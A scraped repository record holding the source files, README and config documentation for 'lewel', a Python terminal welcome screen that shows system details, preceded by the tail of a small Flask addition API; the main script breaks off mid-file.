form=form, s=s)\n# else:\n# return render_template(\"view_input.html\", form=form)\n#\n# if __name__ == '__main__':\n# app.run(debug=True)\n\nfrom flask_restplus import Api, Resource, fields\nfrom flask import Flask, jsonify, request, make_response, abort, render_template, redirect, url_for\n\napp = Flask(__name__)\napi = Api(app, version='1.0', title='MuseFind Tagging API', description='Automated Tagging By NLP')\nns = api.namespace('MuseFind_api', description='Methods')\nsingle_parser = api.parser()\nsingle_parser.add_argument('n', type=int, required=True, help= 'first number')\nsingle_parser.add_argument('m', type=int, required=True, help= 'second number')\n\n\ndef summation(a, b):\n return a+b\n\n\[email protected]('/addition')\nclass Addition(Resource):\n \"\"\"Uploads your data to the recommender system\"\"\"\n @api.doc(parser=single_parser, description='Enter Two Integers')\n def get(self):\n \"\"\"Uploads a new transaction to Rex (Click to see more)\"\"\"\n args = single_parser.parse_args()\n n1 = args.n\n m1 = args.m\n r = summation(n1, m1)\n print(r)\n return {'add': r}\n\n\nif __name__ == '__main__':\n # app.run(host='0.0.0.0', port=3000)\n app.run(debug=True)\n" } ]
10
pintard/lewel
https://github.com/pintard/lewel
9a22f4085f3f50d30075bf224c6936b95695c112
9fcea61dd7531eede5617e3b65e791b2271e0970
c8416023d24e25a15713944ca2b76948918e4760
refs/heads/master
2023-06-09T10:02:50.551897
2021-07-03T14:04:14
2021-07-03T14:04:14
382,598,616
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5707039833068848, "alphanum_fraction": 0.5838456749916077, "avg_line_length": 34.55191421508789, "blob_id": "389b90971cd728faa58e0cc5fec1cd52853a51f2", "content_id": "2e8db4b08d5cb7d7c40989f7db67f49ff5f0ef97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13034, "license_type": "no_license", "max_line_length": 108, "num_lines": 366, "path": "/bin/detailer.py", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "import sys, os\nfrom json import load\n\n# Configurations\nmain_directory = os.path.dirname(__file__)\nabsolute_path = os.path.join(main_directory, \"config/config.json\")\nwith open(absolute_path) as config_file:\n config_data = load(config_file)\n# Manipulation\nwelcome_message = config_data[\"welcome_message\"]\ndate_format = config_data[\"date_format\"]\nuptime_format = config_data[\"uptime_format\"]\nmemory_format = config_data[\"memory_format\"]\npf_result = config_data[\"pf_result\"]\nshould_display_blocks = config_data[\"should_display_blocks\"]\nshould_display_text = config_data[\"should_display_text\"]\nshould_display_keys = config_data[\"should_display_keys\"]\ncolor_block_node = config_data[\"color_block_node\"]\ndivider_node = config_data[\"hr_divider_node\"]\ndivider_repeat = config_data[\"hr_node_repeat\"]\nbullets = {\n \"DEFAULT\": config_data[\"default_bullet\"],\n \"INTERFACE\": config_data[\"interface_bullet\"],\n \"MACHINE\": config_data[\"machine_bullet\"],\n \"SHELL\": config_data[\"shell_bullet\"],\n \"CPU\": config_data[\"cpu_bullet\"],\n \"RAM\": config_data[\"ram_bullet\"],\n \"UPTIME\": config_data[\"uptime_bullet\"],\n \"DATE\": config_data[\"date_bullet\"]\n}\nword_wrap = config_data[\"word_wrap\"]\n# Colors\nuser_ = config_data[\"user_string_color\"]\nmachine_ = config_data[\"machine_string_color\"]\nhr_ = config_data[\"hr_color\"]\nkey_ = config_data[\"detail_key_color\"]\nval_ = config_data[\"detail_value_color\"]\ntxt_ = config_data[\"text_description_color\"]\nbullet_ = {\n \"DEFAULT\": config_data[\"default_bullet_color\"],\n \"INTERFACE\": config_data[\"interface_bullet_color\"],\n \"MACHINE\": config_data[\"machine_bullet_color\"],\n \"SHELL\": config_data[\"shell_bullet_color\"],\n \"CPU\": config_data[\"cpu_bullet_color\"],\n \"RAM\": config_data[\"ram_bullet_color\"],\n \"UPTIME\": config_data[\"uptime_bullet_color\"],\n \"DATE\": config_data[\"date_bullet_color\"]\n}\n# Overrides\ninterface_override = config_data[\"interface_override\"]\nmachine_override = config_data[\"machine_override\"]\nshell_override = config_data[\"shell_override\"]\ncpuram_override = config_data[\"cpuram_override\"]\nuptime_override = config_data[\"uptime_override\"]\ndate_override = config_data[\"date_override\"]\n# FG Escape sequences\nCOLORS = {\n \"black\": \"\\x1b[30m\",\n \"red\": \"\\x1b[31m\",\n \"green\": \"\\x1b[32m\",\n \"yellow\": \"\\x1b[33m\",\n \"blue\": \"\\x1b[34m\",\n \"magenta\": \"\\x1b[35m\",\n \"cyan\": \"\\x1b[36m\",\n \"white\": \"\\x1b[37m\",\n \"light black\": \"\\x1b[90m\",\n \"light red\": \"\\x1b[91m\",\n \"light green\": \"\\x1b[92m\",\n \"light yellow\": \"\\x1b[93m\",\n \"light blue\": \"\\x1b[94m\",\n \"light magenta\": \"\\x1b[95m\",\n \"light cyan\": \"\\x1b[96m\",\n \"light white\": \"\\x1b[97m\"\n}\nEND = \"\\x1b[0m\"\nBOLD = \"\\x1b[1m\"\nITALIC = \"\\x1b[3m\"\nUNDERLINE = \"\\x1b[4m\"\n\n\n# Returns the user preferred color string\ndef color_(string_color):\n try:\n return COLORS[string_color]\n except KeyError:\n print(\"The color \" + COLORS[\"red\"] + \"\\\"\" + string_color + \"\\\"\" + END + \\\n \" is not a valid color. pls refer to gh page or doc for valid colors\")\n sys.exit(0)\n\n\n# Return machine make and model\ndef get_make_manufacture():\n from subprocess import run # for manufacture\n if sys.platform == (\"linux\" or \"linux2\"):\n return \"Linux\"\n elif sys.platform == \"darwin\":\n sys_info = run([\n \"system_profiler\",\n \"SPHardwareDataType\"\n ], capture_output=True).stdout.decode()\n start_string = \"Model Name: \"\n start_index = sys_info.find(start_string) + len(start_string)\n return sys_info[start_index: sys_info.find(\"\\n\", start_index)]\n elif sys.platform == \"win32\":\n return \"Windows\"\n return sys.platform\n\n\n# Returns os string \"OS: macOS Big Sur v11.0.1\"\ndef get_osstring():\n from subprocess import run # for version\n osname = \"\"\n osversion = \"\"\n osversionname = \"\"\n if sys.platform == (\"linux\" or \"linux2\"):\n osname = \"Linux\"\n elif sys.platform == \"darwin\":\n osversion = run([\"sw_vers\", \"-productVersion\"], capture_output=True).stdout.decode().strip('\\n')\n if osversion[0:5] == \"10.14\":\n osversionname = \"Mojave\"\n elif osversion[0:5] == \"10.15\":\n osversionname = \"Catalina\"\n elif osversion[0:4] == \"11.0\":\n osversionname = \"Big Sur\"\n osname = \"macOS\"\n elif sys.platform == \"win32\":\n osname = \"Windows\"\n else:\n osname = sys.platform\n return osname + \" \" + osversionname + \" \" + osversion\n\n\n# Returns system uptime\ndef get_uptime():\n from subprocess import check_output # for uptime\n uptime_string = check_output('uptime').decode().replace(',', '').split()\n if any(s in uptime_string for s in ['day','days']):\n days = int(uptime_string[2])\n if any(s in uptime_string for s in ['min', 'mins']):\n hrs = 0\n mins = uptime_string[4]\n else:\n hrs, mins = map(int, uptime_string[4].split(':'))\n elif any(s in uptime_string for s in ['min', 'mins']):\n days = 0\n hrs = 0\n mins = int(uptime_string[4])\n elif any(s in uptime_string for s in ['hr', 'hrs']):\n days = int(uptime_string[2])\n hrs = int(uptime_string[4])\n mins = 0\n else:\n days = 0\n hrs, mins = map(int, uptime_string[2].split(':'))\n if uptime_format == \"hours\":\n tot_hrs = (days * 24) + hrs\n return str(tot_hrs) + \" hrs, \" + str(mins) + \" mins\"\n elif uptime_format == \"days\":\n return str(days) + \" days, \" + str(hrs) + \" hrs\"\n elif uptime_format == \"colon\":\n return \"{}:{}:{}\".format(days, hrs, mins)\n return str(days) + \" days, \" + str(hrs) + \" hrs, \" + str(mins) + \" mins\"\n\n\n# Returns current date string\ndef get_date():\n from datetime import datetime # for date display\n if date_format == \"full\":\n return datetime.now().strftime(\"%b %d, %Y\")\n elif date_format == \"mmddyy\":\n return datetime.now().strftime(\"%m / %d / %y\")\n elif date_format == \"daydd\":\n return datetime.now().strftime(\"%A \" + BOLD + \"%d\" + END)\n\n\n# Returns shell string ZSH 5.8\ndef get_shellstring():\n from os import environ # for machine info\n from subprocess import run # shell version\n shell_type = environ['SHELL'].split('/')[-1].upper()\n current_version = \"\"\n if shell_type == \"ZSH\":\n shell_version = run([\"zsh\", \"--version\"], capture_output=True).stdout.decode()\n maybe_version = []\n for text in shell_version.split():\n try:\n maybe_version.append(float(text))\n except ValueError:\n pass\n if len(maybe_version) == 1:\n current_version = str(maybe_version[0])\n if shell_type == \"BASH\":\n shell_version = run([\"bash\", \"--version\"], capture_output=True).stdout.decode()\n start_string = \"version \"\n start_index = shell_version.find(start_string) + len(start_string)\n end_string = \"(1)\"\n current_version = shell_version[start_index: shell_version.find(end_string)]\n return shell_type + \" \" + current_version\n\n\n# Returns user string \"User \\ machine\"\ndef get_userstring():\n from os import environ, uname # for machine info\n username = environ['USER'].upper()\n hostname = uname()[1]\n return color_(user_) + BOLD + username + END + \\\n color_(machine_) + \" \\ \" + hostname + END\n\n\n# Returns system usage\ndef get_usage(choice):\n from psutil import virtual_memory # for performance data\n cpu_use_string = \"\"\n ram_use_string = \"\"\n # Unit conversions\n divider = 2**30 # 1e+9\n if memory_format[1] == \"MiB\":\n divider = 2**20 # 1e+6\n # Actual values\n total = virtual_memory().total / divider\n available = virtual_memory().available / divider\n used = total - available\n # Actual percentages\n cpu_use_percent = available * 100 / total\n ram_use_percent = virtual_memory().percent\n if memory_format[0] == \"percent\":\n cpu_use_string = \"{:.2f} %\".format(cpu_use_percent)\n ram_use_string = \"{:.2f} %\".format(ram_use_percent)\n elif memory_format[0] == \"values\":\n cpu_use_string = \"{:.2f} / {:.0f} {}\".format(available, total, memory_format[1])\n ram_use_string = \"{:.2f} / {:.0f} {}\".format(used, total, memory_format[1])\n elif memory_format[0] == \"both\":\n cpu_use_string = \"{:.2f} / {:.0f} {} \".format(available, total, memory_format[1]) + \\\n BOLD + \"({:.2f}%)\".format(cpu_use_percent)\n ram_use_string = \"{:.2f} / {:.0f} {} \".format(used, total, memory_format[1]) + \\\n BOLD + \"({:.2f}%)\".format(ram_use_percent)\n return cpu_use_string if choice == \"CPU\" else ram_use_string\n\n\n# Returns the color blocks for ANSI 1-16\ndef blocks_(type):\n x = 0\n y = 0\n if len(color_block_node.strip()) == 0:\n x = 4\n y = 10\n else:\n x = 3\n y = 9\n blocks = \"\"\n if type == \"normal\":\n for i in range(8):\n blocks += \"\\x1b[{}{}m\".format(x, i) + color_block_node + END\n elif type == \"bright\":\n for i in range(8):\n blocks += \"\\x1b[{}{}m\".format(y, i) + color_block_node + END\n if should_display_blocks == True:\n return blocks\n else:\n return \"\"\n\n\n# Returns folded paragraph in array of sentences\ndef fold_paragraph(para):\n num_lines = len(para) / word_wrap # of lines\n if num_lines > round(num_lines) and num_lines % round(num_lines) > 0:\n num_lines += 1 - num_lines % round(num_lines)\n else:\n num_lines = round(num_lines)\n words = para.split(' ')\n columns_counted = 0\n temp_words = []\n sentences = []\n for word in words:\n if columns_counted <= word_wrap:\n columns_counted += len(word) + 1 # +1 space\n temp_words.append(word)\n if columns_counted >= word_wrap:\n columns_counted = 0\n if columns_counted == 0:\n sentence = ' '.join(temp_words)\n sentences.append(sentence)\n temp_words = []\n if len(sentences) < num_lines:\n para_sofar = ' '.join(sentences)\n remainder = para.replace(para_sofar, \" \").strip()\n if len(remainder) > 0:\n sentences.append(remainder)\n for i, sentence in enumerate(sentences):\n sentences[i] = ITALIC + color_(txt_) + sentence + END\n return sentences\n\n\n# Return detail string \"NAME: detail information\"\ndef detail(name, content):\n bullet = bullets[\"DEFAULT\"]\n bullet_color = bullet_[\"DEFAULT\"]\n if bullets[name] != \"\":\n bullet = bullets[name]\n if bullet_[name] != \"\":\n bullet_color = bullet_[name]\n spaces = \" \" * (12 - len(name))\n if should_display_keys == True:\n return (color_(bullet_color) + \"{}\" + color_(key_) + BOLD + \"{}\" + END + spaces + \\\n color_(val_) + \"{}\" + END).format(bullet, name, content)\n else:\n return (color_(bullet_color) + \"{}\" + END + \" \" + color_(val_) + \"{}\" + END).format(bullet, content)\n\n\n\n# Empty line\nempty_line = ''\n# ∙∙∙∙∙∙∙∙∙∙∙\ndivider_line = color_(hr_) + divider_node * divider_repeat + END\n\n\n# Manipulate displayed data here\ndef detail_list():\n # Initialization details\n init_data = {}\n userstring = \"\"\n osstring = \"\"\n make_manufacture = \"\"\n shellstring = \"\"\n try:\n abs_path = os.path.join(main_directory, \".assist/details.json\")\n with open(abs_path) as detail_file:\n init_data = load(detail_file)\n userstring = init_data[\"userstring\"]\n osstring = init_data[\"osstring\"] if interface_override == \"\" else interface_override\n make_manufacture = init_data[\"make_manufacture\"] if machine_override == \"\" else machine_override\n shellstring = init_data[\"shellstring\"] if shell_override == \"\" else shell_override\n except FileNotFoundError:\n print(\"Details not found... please initialize program with \" + \\\n COLORS[\"light green\"] + \"lewel init\" + END)\n sys.exit(0)\n details = [\n blocks_(\"normal\"),\n blocks_(\"bright\"),\n empty_line,\n userstring,\n divider_line,\n detail(\"INTERFACE\", osstring),\n detail(\"MACHINE\", make_manufacture),\n detail(\"SHELL\", shellstring),\n detail(pf_result, get_usage(pf_result)),\n detail(\"UPTIME\", get_uptime()),\n detail(\"DATE\", get_date()),\n empty_line,\n ITALIC + color_(txt_) + welcome_message + END\n ]\n if cpuram_override is False:\n del details[-5]\n if uptime_override is False:\n del details[-4]\n if date_override is False:\n del details[-3]\n if should_display_text == False:\n del details[details.index(blocks_(\"bright\"))+1:-1]\n if should_display_blocks == False:\n del details[0:details.index(userstring)]\n if len(welcome_message) > word_wrap:\n del details[-1]\n sentences = fold_paragraph(welcome_message)\n details.extend(sentences)\n return details\n" }, { "alpha_fraction": 0.6321295499801636, "alphanum_fraction": 0.6459108591079712, "avg_line_length": 31.80858039855957, "blob_id": "bb0c0840f53d1e80e906a88fb55b896c43e0e103", "content_id": "9d4c81f8b985e6b76b8fb30314bfab0b9932f381", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9995, "license_type": "no_license", "max_line_length": 366, "num_lines": 303, "path": "/README.md", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "# **lewel**\n\nlewel is a terminal diagnostic and welcome screen program written in python. So far it has support for macOS devices running python3 and macOS version 11.0.1 (2/20).\n\n![sample image](sample.png)\n\n## **TABLE OF CONTENTS**\n\n[I. Usage](#Usage)\n\n1. [Getting Started](#GETTING-STARTED)\n2. [Commands](#COMMANDS)\n\n[II. Configurations](#Configurations)\n\n1. [Images](#IMAGES)\n2. [Display](#DISPLAY)\n3. [Positioning](#POSITIONING)\n4. [Date](#DATE)\n5. [Uptime](#UPTIME)\n6. [Memory & Performance](#MEMORY-AND-PERFORMANCE)\n7. [Colors](#COLORS)\n\n---\n\n## Usage\n\n### [**GETTING STARTED**](#TABLE-OF-CONTENTS)\n\nThe use of the program is simply to display a welcome screen so to get started is as simple as typing: `lewel init`. After answering the prompted questions to select your image or prexel, you can then type `lewel`.\n\nTo make sure lewel loads everytime your window is open you have to call it in your `.zshrc`, `.bashrc`, `.bash_profile` (which is typically found in your `$HOME` directory as a hidden file, or `/Users/user`), or whatever shell source file you're using. To do make this call automatically on each launch place the following at the very top of the aforementioned file:\n\n**NOTE:** It's best practice to run the lewel program in your shell configuration file only after you've initialized\nit for the very first time.\n\n```zsh\nexport PATH=\"$PATH:$HOME/.lewel/bin\"\nlewel # run lewel\n```\n\n### [**COMMANDS**](#TABLE-OF-CONTENTS)\n\n| **COMMAND SEQ** | **DEFINITION** |\n|-----------------------|---------------------------------------------------------------------|\n| `$ lewel` | will print the welcome screen to terminal |\n| `$ lewel init` | will init/reinitialize the program. useful for adding/changing pics |\n| `$ lewel reset` | will reset the program excluding configuration details |\n| `$ lewel config` | will run the command line configuration wizard |\n| `$ lewel config open` | will open configuration file in default text editor/application |\n| `$ lewel config vim` | will open configuration file in vim text editor |\n| `$ lewel help` | will print this help message |\n\n---\n\n## Configurations\n\nThis program is configurable to tailor your own message. Check `config.json` and make changes accoring to these valid options listed.\n\n**IMPORTANT:** Deleting any of the `config.json` keys or values can result in breaking the program, so it is advised that users only make the suggested changes leaving keys untouched and perhaps nullifying corresponding values if the description of this manual says you're allowed to do so.\n\n**NOTE:** Some configuration changes take place as soon as you make changes to the config.json file or the configuration\nwizard. For changes not readily noticeable, it is advised that you run `lewel init` and simply press any key so the\nprogram can recognize the latest changes to the configuration file.\n\nIf you find yourself in need of another `config.json` create a new file named \"config.json\" w the following content:\n\n```json\n{\n \"welcome_message\": \"\",\n \"date_format\": \"full\",\n \"uptime_format\": null,\n \"memory_format\": [\n \"values\",\n \"MiB\"\n ],\n \"pf_result\": \"RAM\",\n \"should_display_image\": true,\n \"should_display_blocks\": true,\n \"should_display_text\": true,\n \"should_display_keys\": true,\n \"color_block_node\": \" \",\n \"space_before\": 8,\n \"space_after\": 6,\n \"lines_before\": 2,\n \"lines_after\": 2,\n \"hr_divider_node\": \"\\u2219\",\n \"hr_node_repeat\": 38,\n \"default_bullet\": \"\",\n \"interface_bullet\": \"\\ufb32 \",\n \"machine_bullet\": \"\\uf109 \",\n \"shell_bullet\": \"\\uf489 \",\n \"cpu_bullet\": \"\\ue266 \",\n \"ram_bullet\": \"\\ue266 \",\n \"uptime_bullet\": \"\\uf017 \",\n \"date_bullet\": \"\\uf073 \",\n \"word_wrap\": 30,\n \"user_string_color\": \"light yellow\",\n \"machine_string_color\": \"light green\",\n \"hr_color\": \"light blue\",\n \"detail_key_color\": \"yellow\",\n \"detail_value_color\": \"light white\",\n \"text_description_color\": \"light green\",\n \"default_bullet_color\": \"red\",\n \"interface_bullet_color\": \"blue\",\n \"machine_bullet_color\": \"light red\",\n \"shell_bullet_color\": \"light magenta\",\n \"cpu_bullet_color\": \"yellow\",\n \"ram_bullet_color\": \"light green\",\n \"uptime_bullet_color\": \"light white\",\n \"date_bullet_color\": \"light blue\",\n \"interface_override\": \"\",\n \"machine_override\": \"\",\n \"shell_override\": \"\",\n \"cpuram_override\": true,\n \"uptime_override\": true,\n \"date_override\": true\n}\n```\n\n---\n\n### [**IMAGES**](#TABLE-OF-CONTENTS)\n\nDo you want to display a picture? `true` or `false`\n\n```python\nshould_display_image = True\n\n# OR\n\nshould_display_image = False\n```\n\nInsert the path to your display image in this variable.\n\n```python\npath_to_image = \"sample.jpg\"\n```\n\nThe width and height of the picture in number of terminal cursor blocks. The suggested ratio is roughly 3:1 for width and height\n\n```python\n# Dimension ratio 40/14 = 2.86 ~> 3.0\n# Appropriate for terminal welcome screen\nwidth = 40\nheight = 14\n```\n\n---\n\n### [**DISPLAY**](#TABLE-OF-CONTENTS)\n\nDo you want to display the ANSI color blocks or the textual information? `true` or `false`\n\n```python\n# The size of the color block\ncolor_block_size = 4\n# xterm color theme in ANSI blocks\nshould_display_blocks = True\n# All of the system information text\nshould_display_text = False\n```\n\n- You can add a brief welcome message to your lewel that won't print anything if the field is left empty. But it will print past the length of the provided image (if there is one), so it does have a limitless range.\n\n- The amount by which you want to wrap your welcome message in number of approximate characters (to the nearest word)\n\n```python\n# Your custom message\nwelcome_message = \"Welcome to your terminal\"\n# Word wrapping\nword_wrap = 30\n```\n\n- You can set a divider between your username and your relevant data. The \"node\" for this divider can be any character. Common characters are '`-`', '`*`' and '`#`' the default choice for lewel is '`∙`' (U+2219). You can also choose how frequent you want this node repeated given an integer\n\n- You can also set a preferred bullet point for all of the detail keys and in this configuration you can set whichever character and space combination you'd like within reason.\n\n```python\n# Choice of divider node ∙∙∙∙∙\nhr_divider_node = \"∙\"\n# Number of times to repeat\nhr_node_repeat = 32\n# Detail key bullet point\nbullet = \"- \"\n```\n\n---\n\n### [**POSITIONING**](#TABLE-OF-CONTENTS)\n\nYou can control where your pictures or text lies on the screen through the use of cursor spaces and carriage returns. These options take integer values\n\n```python\n# The space before picture or text\nspace_before = 6\n# The space after picture\nspace_after = 8\n# Number of lines before message\nlines_before = 1\n# Number of lines after message\nlines_after = 1\n```\n\nThis is helpful for combinations involving the choice of display for images, text and color blocks.\n\n---\n\n### [**DATE**](#TABLE-OF-CONTENTS)\n\nYou can add a date in any of the following formats `full`, `mmddyy`, or `daydd`.\n\n```python\ndate_format = \"daydd\"\n```\n\nThe options render the following outputs\n\n| OPTION | DISPLAY |\n|----------|---------------|\n| `full` | Jan 01, 2020 |\n| `mmddyy` | 01/01/20 |\n| `daydd` | Wednesday 01 |\n\n---\n\n### [**UPTIME**](#TABLE-OF-CONTENTS)\n\nYou can add a computer **uptime** display in any of the following formats `days`, `hours`, or `colon`.\n\n```python\nuptime_format = \"days\"\n```\n\nThe options render the following outputs\n\n| OPTION | DISPLAY |\n|---------|-------------------------|\n| `null` | 40 days, 1 hrs, 12 mins |\n| `days` | 20 days, 20 hours |\n| `hours` | 300 hrs, 6 mins |\n| `colon` | 12:02:34 |\n\n---\n\n### [**MEMORY AND PERFORMANCE**](#TABLE-OF-CONTENTS)\n\nYou can either choose to display CPU performance of RAM performance as `CPU` or `RAM` using the performance result variable `pf_result` below\n\n```python\npf_result = \"CPU\"\n```\n\nYou can display this information using a format combination as described in the array below\n\n```python\nmemory_format = [\"values\", \"MiB\"]\n```\n\nThe options in the first index of the memory format array controls the template form of the display and the second index controls the unit value. The unit value can either be defined as Mebibyte `MiB` or Gigabyte `GB`. The template forms are either `percent`, `values` or `both`. There displays are as shown:\n\n| OPTION 1 | OPTION 2 | DISPLAY |\n|-----------|--------------|----------------------|\n| `percent` | `GB` / `MiB` | 24.81 % |\n| `values` | `MiB` | 2089.54 / 8192 MiB |\n| `both` | `GB` | 2.20 / 8 GB (27.49%) |\n\n---\n\n### [**COLORS**](#TABLE-OF-CONTENTS)\n\nYou can customize lewel with a preferred color for several of the detail text components. These colors are the templated 16-choice colors your terminal uses. To modify these specific colors, you will have to change the corresponding ANSI color in your terminal profile (located usually in the settings of your emulator).\n\nThe following color values are:\n\n| **Normal** | **Light** |\n|------------|---------------|\n|black | light black |\n|red | light red |\n|green | light green |\n|yellow | light yellow |\n|blue | light blue |\n|magenta | light magenta |\n|cyan | light cyan |\n|white | light white |\n\nAll of the color related mutable objects are as follows:\n\n```python\n# USER /\nuser_string_color: \"red\"\n# / host\nmachine_string_color: \"light red\"\n# ∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙\nhr_color: \"cyan\"\n# OS, MACHINE, SHELL\ndetail_key_color: \"blue\"\n# ZSH 5.X, [Date info]\ndetail_value_color: \"light blue\"\n# Blah blah blah blah blah blah blah blah\ntext_description_color: \"light green\"\n```\n" }, { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 5.666666507720947, "blob_id": "245a9ce7348ec1a44df702807659206b1f758d6c", "content_id": "f176def2f6e21738aeb73f5757227797b4ffb08d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 21, "license_type": "no_license", "max_line_length": 6, "num_lines": 3, "path": "/requirements.txt", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "pillow\r\nnumpy\r\npsutil" }, { "alpha_fraction": 0.4927210807800293, "alphanum_fraction": 0.5043094158172607, "avg_line_length": 39.25364303588867, "blob_id": "9a3503ef64ffcba38f81f75bc81e3fdc9bac045e", "content_id": "803ee60e84a3548a8ff360e3a355f552cc03638a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13807, "license_type": "no_license", "max_line_length": 113, "num_lines": 343, "path": "/bin/lewel", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# coding: utf-8\nimport sys\nimport os\nfrom json import load, dump, decoder\n\n\nclass NORMAL:\n black = \"\\x1b[30m\"\n red = \"\\x1b[31m\"\n green = \"\\x1b[32m\"\n yellow = \"\\x1b[33m\"\n blue = \"\\x1b[34m\"\n magenta = \"\\x1b[35m\"\n cyan = \"\\x1b[36m\"\n white = \"\\x1b[37m\"\n\n\nclass LIGHT:\n black = \"\\x1b[90m\"\n red = \"\\x1b[91m\"\n green = \"\\x1b[92m\"\n yellow = \"\\x1b[93m\"\n blue = \"\\x1b[94m\"\n magenta = \"\\x1b[95m\"\n cyan = \"\\x1b[96m\"\n white = \"\\x1b[97m\"\n\n\nEND = \"\\x1b[0m\"\nshadow_image = \".assist/.plew\"\n\n\n# Configurations\nmain_directory = os.path.dirname(__file__)\njson_path = os.path.join(main_directory, \"config/config.json\")\ntry:\n with open(json_path) as config_file:\n config_data = load(config_file)\n should_display_image = config_data[\"should_display_image\"]\n should_display_text = config_data[\"should_display_text\"]\n should_display_blocks = config_data[\"should_display_blocks\"]\n space_before = config_data[\"space_before\"]\n space_after = config_data[\"space_after\"]\n lines_before = config_data[\"lines_before\"]\n lines_after = config_data[\"lines_after\"]\nexcept FileNotFoundError:\n print(LIGHT.red + \"Configuration file missing. Reinstall or find configuration in README\" + END)\n sys.exit(0)\nexcept decoder.JSONDecodeError:\n print(LIGHT.red + \"Configuration file corrupted. Reinstall or find configuration in README\" + END)\n sys.exit(0)\n\n\ndef open_image():\n try:\n abs_path = os.path.join(main_directory, shadow_image)\n with open(abs_path, \"r\") as image_file:\n return image_file.readlines()\n except FileNotFoundError:\n print(\"Image file doesn't exist. Try reinitializing program with \" +\n LIGHT.green + \"lewel init\" + END + \" and then adding a prexel or an image\")\n sys.exit(0)\n\n\ndef system_image():\n image_lines = open_image()\n for line in image_lines:\n print(' ' * space_before, end='')\n print(line, end='')\n print()\n\n\ndef system_message():\n import detailer\n details = detailer.detail_list()\n for line in details:\n print(' ' * space_before, end='')\n print(line, end='\\n')\n\n\ndef system_message_image():\n import detailer\n details = detailer.detail_list()\n image_lines = open_image()\n length = 0\n if len(image_lines) > len(details):\n length = len(image_lines)\n diff = len(image_lines) - len(details)\n details.extend([\"\"] * diff)\n else:\n length = len(details)\n diff = len(details) - len(image_lines)\n spacer = ' ' * (len(image_lines[0].split(' ')) - 1)\n image_lines.extend([spacer] * diff)\n for line in range(length):\n print(' ' * space_before, end='')\n print(image_lines[line].replace('\\n', ''), end='')\n print(' ' * space_after, end='')\n print(details[line], end='\\n')\n\n\ndef run_lewel():\n print('\\n' * lines_before, end='')\n if should_display_image == True and should_display_text == True:\n system_message_image()\n if should_display_image == False and should_display_text == True:\n system_message()\n if should_display_image == True and should_display_text == False:\n system_image()\n if should_display_text == False and should_display_blocks == True:\n system_message()\n print('\\n' * lines_after, end='')\n\n\ndef setup_lewel():\n import imager\n import detailer\n print()\n choice = input(LIGHT.green +\n \"Do you want to upload a prexel (1) an image (2) or just reinitialize (ANY)? \" +\n END)\n if choice == \"1\": # PREXEL IMPORT\n from shutil import copyfile\n print(LIGHT.magenta + \"\\n(1) Using custom prexel image... \" + END, end='')\n try:\n path = input(LIGHT.yellow + \"Enter prexel path: \" + END)\n abs_plew = os.path.join(main_directory, shadow_image)\n copyfile(path, abs_plew)\n except FileNotFoundError:\n print(LIGHT.red + \"\\n!!! No valid file provided !!!\" + END)\n elif choice == \"2\": # IMAGE IMPORT\n print(LIGHT.magenta + \"\\n(2) Using normal picture:\" + END, end='\\n')\n print(LIGHT.red + \"\\n!!! In number of cursor columns and cursor rows !!!\" + END, end='\\n')\n width = 0\n height = 0\n while True:\n try:\n width = int(input(LIGHT.yellow + \"\\nWIDTH: \" + END))\n height = int(input(LIGHT.yellow + \"\\nHEIGHT: \" + END))\n break\n except ValueError:\n print(LIGHT.red + \"\\nOne of the values entered is not an integer\" + END)\n try:\n path = input(LIGHT.yellow + \"\\nEnter photo path: \" + END)\n image = imager.create_image(path, width, height)\n imager.write_image(image)\n except FileNotFoundError:\n print(LIGHT.red + \"\\n!!! No valid file provided !!!\" + END)\n abs_path = os.path.join(main_directory, \".assist/details.json\")\n with open(abs_path, \"w\", encoding=\"utf-8\") as detail_file:\n init_data = {\n 'userstring': detailer.get_userstring(),\n 'osstring': detailer.get_osstring(),\n 'make_manufacture': detailer.get_make_manufacture(),\n 'shellstring': detailer.get_shellstring()\n }\n dump(init_data, detail_file, ensure_ascii=False, indent=4)\n\n\ndef config_lewel():\n class TooBigError(Exception):\n pass\n\n class UnfinishedProcessError(Exception):\n pass\n from yaml import safe_load\n yaml_path = os.path.join(main_directory, \"config/.config_options.yaml\")\n try:\n with open(yaml_path, 'r') as config_options_file:\n yaml_data = safe_load(config_options_file)\n except FileNotFoundError:\n print(LIGHT.red + \"Configuration options file missing. Reinstall or find options list\\n\" + END)\n sys.exit(0)\n for i, (key, value) in enumerate(config_data.items()):\n print(LIGHT.magenta + \"[%d]\" %\n (i + 1) + LIGHT.yellow + \" %s\" % key + END)\n print(NORMAL.red + \"[0]\" + LIGHT.red + \" to cancel\" + END)\n while True:\n while True:\n try:\n choice = input(LIGHT.green +\n \"\\nChoose a property to configure...\\nPress [0] to save or [h] for help: \" +\n LIGHT.magenta)\n if choice == \"h\":\n raise UnfinishedProcessError\n elif int(choice) > len(config_data.items()):\n raise TooBigError\n break\n except UnfinishedProcessError:\n for i, (key, value) in enumerate(config_data.items()):\n print(LIGHT.magenta + \"[%d]\" %\n (i + 1) + LIGHT.yellow + \" %s\" % key + END)\n except TooBigError:\n print(NORMAL.red + \"\\nERROR: Option doesn't exist\" + END)\n except ValueError:\n print(NORMAL.red + \"\\nERROR: Not a number\" + END)\n if int(choice) == 0:\n print(\n LIGHT.red + \"\\nSaving changes and quitting command line configuration wizard\" + END)\n break\n key, value = list(config_data.items())[int(choice) - 1]\n option_value = list(yaml_data.values())[int(choice) - 1]\n if type(value) is list:\n value = \"[\" + ', '.join(value) + \"]\"\n print(\"\\n\" + LIGHT.blue + key + \": \" +\n LIGHT.yellow + str(value) + END, end=\"\\n\")\n COLORS = {\n \"black\": \"\\x1b[30m\",\n \"red\": \"\\x1b[31m\",\n \"green\": \"\\x1b[32m\",\n \"yellow\": \"\\x1b[33m\",\n \"blue\": \"\\x1b[34m\",\n 